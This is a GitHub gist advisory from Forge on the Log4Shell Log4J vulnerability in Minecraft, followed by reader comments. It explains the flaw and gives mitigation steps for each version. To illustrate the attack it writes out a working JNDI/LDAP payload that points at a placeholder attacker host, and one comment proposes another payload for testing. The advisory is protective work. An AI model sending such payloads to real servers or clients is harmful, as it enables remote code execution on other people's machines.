Skip to content

Instantly share code, notes, and snippets.

@TheCurle
Last active October 28, 2023 18:47
Show Gist options
  • Star 38 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6 to your computer and use it in GitHub Desktop.
Save TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6 to your computer and use it in GitHub Desktop.

Log4J CVE Advisory

The Problem

Log4J has a feature called Java Naming and Directory Interface (shortened to JNDI in this document), which allows a Java program to reach out to an external source to gather data.
If you put a section of text containing ${jndi:query} into the log, the Log4J library will try to resolve the query.
This can be combined with the Lightweight Directory Access Protocol (LDAP) to connect to a remote server.

However, because JNDI is built for retrieving data, and JNDI is a Java program, if you put a JNDI query using LDAP into a log, it will connect to the given site, download a file, and then execute it.
This is called Remote Code Execution.

The problem is that Minecraft logs everything that happens in the world.
Every message, every death, every achievement.
Any of these can contain a JNDI query.

This might not seem so bad yet, but consider the following:

  • You create a small Java program that executes shutdown now in a shell.
  • You host the Java class file on a small webserver.
  • You join any Minecraft server
  • You send the message ${jndi:ldap://your.ip.com/exploit/} into the chat of the server
  • The server (and every client connected) logs the chat message.
    • The logger downloads the class file.
    • The class file is executed.
    • The server's and every client's computer shut down, with no warning.

This exploit is called Log4Shell.

This is a brutal bug. It can be used for much more than just shutting down.
It can run crypto miners, it can install ransomware, it can just straight up format your main hard drive...

See technical details on the exploit here, Mojang's advice here (note that this doesn't apply to Forge, read on.).
See also, what you can do with the exploit if you want to have actual fun here.

Help?

Don't panic. This document exists to tell you how to protect yourself against it, as a user of Forge.

There's one thing we need to go over, first.

There's a clear and present split around the version of 1.12, regarding the Log4J library.
Versions before 1.12 use an older version of Log4J, and versions after use a newer version.

The newer version added a bunch of optional workarounds that we can use, but the older version has no such options.
I'm going to separate our advice into these two version ranges, but there's another special case and one last topic we'll have to talk about first.

Your client is the most vulnerable.

If a server is protected from the bug, it will send the attack message to all connected clients with no hesitation.
It is therefore of the utmost importance that you ALWAYS, NO MATTER WHAT, protect your client.

You can find more detailed information on how to do that below.

Testing

To test whether or not these changes actually work for you, there's a simple trick.
Open a client.
To test the client:

  • Join any world and send the message ${date:YYYY} in chat.
  • Close the game and inspect the latest.log file. (it's in .minecraft/logs/)
  • Scroll down to the last few messages sent. If you see the text 2021 being sent as a message by yourself, then your client is vulnerable and you should apply the fix listed for your version below.

To test the server:

  • Join the server with your client
  • Send the message ${date:YYYY} in chat.
  • Inspect the server's latest.log file.
  • If you see the text 2021 being sent as a message by yourself, then the server is vulnerable.

The expected behaviour is to either see the text ${date:YYYY} in the log itself, or to not see it at all. Some versions remove the message from the log, some versions just prevent it from resolving. In either case, you must NOT see 2021 in the log file.

CVE-2021-45046

A second, related bug in Log4j was found after the initial patch.

Luckily, we are not affected by this, as it exploits a feature that Minecraft does not use.

The second Log4J bug is not something to worry about.

It is patched by the steps below.

1.11 (and 1.11.2) Clients

1.11's client install has a quirk with the installation.
Forge overrides the vanilla logging configuration with its own.
However, as will be demonstrated later, the vanilla configuration is the one we want to use on the client.

So, to fix this:

  • Close the launcher, if it is open.
  • Find your .minecraft folder (On windows it's %AppData%/.minecraft, on linux it's ~/.minecraft/)
  • Go to the versions folder
  • Find the Forge installation you're using.
    • The latest 1.11.2 Forge folder is called "1.11.2-forge1.11.2-13.20.1.2588"
  • Open the folder
  • Open .json file within, with any text editor.
  • Find the section that looks like:
"logging": {

},
  • Delete the whole logging block, including the last } and the comma.

Now you can restart the game and the fix will be applied to you.

Clients below 1.12

Clients on versions between (and including) 1.7 and 1.11 are automatically protected by a fix that Mojang made.
You MUST restart the launcher for this fix to be applied, but after that point you should be fine.

Clients above 1.12

Above 1.12, the newer library allowed us to make some more thorough changes.
Primarily, we've updated the logging library itself to a version that does not have the ability to connect to external servers at all.

To get this fix, simply go to the files site and download and run the installer for any of these versions:

  • 1.18-38.0.17 or higher
  • 1.17.1-37.1.1 or higher
  • 1.16.5-36.2.20 or higher
  • 1.15.2-31.2.56 or higher
  • 1.14.4-28.2.25 or higher
  • 1.13.2-25.0.222 or higher
  • 1.12.2-14.23.5.2857 or higher

MAKE SURE that the launcher is using this new version and not the older, vulnerable version.

Apart from that, your client is now ready.

Servers

All server operators need to apply an adjusted logging configuration.
It's extremely simple:

  • Download the logging xml file from here
  • Put the file in the server folder (next to the .jar files)
  • Restart the server

That's it. You don't need to do anything else. You're done.
Note that the command line argument -Dlog4j.configurationFile=log4j2_server.xml exists, and can be used on vanilla servers.
Forge does not require this to be used.

Option 1: Fix via Updating

Servers for these versions can benefit from the same fix.
Simply download the LATEST installer from the files site and install it in-place on top of your existing server.
Your existing run scripts should work with minor modifications.

Option 2: Fixed logging configuration

Minecraft Version Recommended Fix
1.7 All server operators need to apply an adjusted logging configuration.
It's extremely simple:

- Download the logging xml file from here
- Put the file in the server folder (next to the .jar files)
- Add the command line argument -Dlog4j.configurationFile=log4j2_server.xml to the server startup script.
- Restart the server

That's it. You don't need to do anything else.
1.8 to 1.11.2 All server operators need to apply an adjusted logging configuration.
It's extremely simple:

- Download the logging xml file from here
- Put the file in the server folder (next to the .jar files)
- Restart the server

That's it. You don't need to do anything else. You're done.
Note that the command line argument -Dlog4j.configurationFile=log4j2_server.xml exists, and can be used on vanilla servers.
Forge does not require this to be used for these versions.
1.12 to 1.12.2 A similar fix as for servers below 1.12 exists for this version.

Simply download this file and put it in the server folder.

Add -Dlog4j.configurationFile=log4j2_server.xml to the run.bat / run.sh file (or the command you use to start the server).
Make sure it's before the -jar part. It must read something like java -Dlog4j.configurationFile=log4j2_server.xml -jar forge-version.jar in order to work.
Apart from that, your server is now ready to restart.
1.13 to 1.16.3 A similar fix as for servers below 1.12 exists for this version.

Simply download this file and put it in the server folder.

Add -Dlog4j.configurationFile=log4j2_server.xml to the run.bat / run.sh file (or the command you use to start the server).
Make sure it's before the -jar part. It must read something like java -Dlog4j.configurationFile=log4j2_server.xml -jar forge-version.jar in order to work.
Apart from that, your server is now ready to restart.
1.16.4 to the current version A similar fix as for servers below 1.12 exists for this version.

Simply download this file and put it in the server folder.

For 1.17 and 1.18, simply put the text -Dlog4j.configurationFile=log4j2_server.xml in the user_jvm_args.txt file.

For older versions, add -Dlog4j.configurationFile=log4j2_server.xml to the run.bat / run.sh file (or the command you use to start the server).
Make sure it's before the -jar part. It must read something like java -Dlog4j.configurationFile=log4j2_server.xml -jar forge-version.jar in order to work.
Apart from that, your server is now ready to restart.
@FinnT730
Copy link

bolb bolb
Nice write up.

@williewillus
Copy link

Thanks for the extensive writeup. Crucial to protect many server operators and players.

@BinBashBanana
Copy link

BinBashBanana commented Dec 12, 2021

@TheCurle can I use the same fix for legacy versions of PaperMC that I would use for vanilla servers?

Edit: to clarify, I mean the fix provided by mojang here.

@Thermawrench
Copy link

Wellwritten!

@PiyushFTW
Copy link

Thank You!

@TheTinyNut
Copy link

So just to clarify, if in the logs it appears as just '${date:YYYY}', it means that you're safe?

@xvsun
Copy link

xvsun commented Dec 22, 2021

@TheTinyNut yes..

@hohserg1
Copy link

hohserg1 commented Dec 22, 2021

${date:YYYY} will use other loolup, so, it can give false-positive result if your setup is safe(disabled jndi) but enabled date lookup
Also it can give false-negative result, if your setup is unsafe(enabled jndi), but disabled date lookup

More proper testing is rename zombie to${jndi:ldap://github.com/marketplace} and kill player by it

@Gaelmare
Copy link

Gaelmare commented Sep 11, 2022

If you've updated 1.12 to 2860 via manual copy of the new forge jar into the server directory, you may get all of your log messages to the console consisting of the text "%minecraftFormatting".

You need to update the libraries directory as well to fix this. This may not be intuitive on a hosted server, but needs to happen.

The 1.12 link above is broken, but it is delivered as part of the 2860 release.

@pandaninjas
Copy link

it can just straight up format your main hard drive

While this is theoretically possible, if the user doesn't have admin/root it is impossible to do.

@itsTyrion
Copy link

itsTyrion commented Jan 23, 2023

it can just straight up format your main hard drive

While this is theoretically possible, if the user doesn't have admin/root it is impossible to do.

it can still wipe your secondary data/game drives and your user profile (incl Desktop/Downloads/Documents/Music/Videos/Pictures/Appdata..), even without admin/root access.

So basically what matters the most. The contents of C:\Program Files/C:\Program Files (x86)/C:\Windows or /usr//opt//var/lib aren't THAT important. Annoying, but not that bad.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment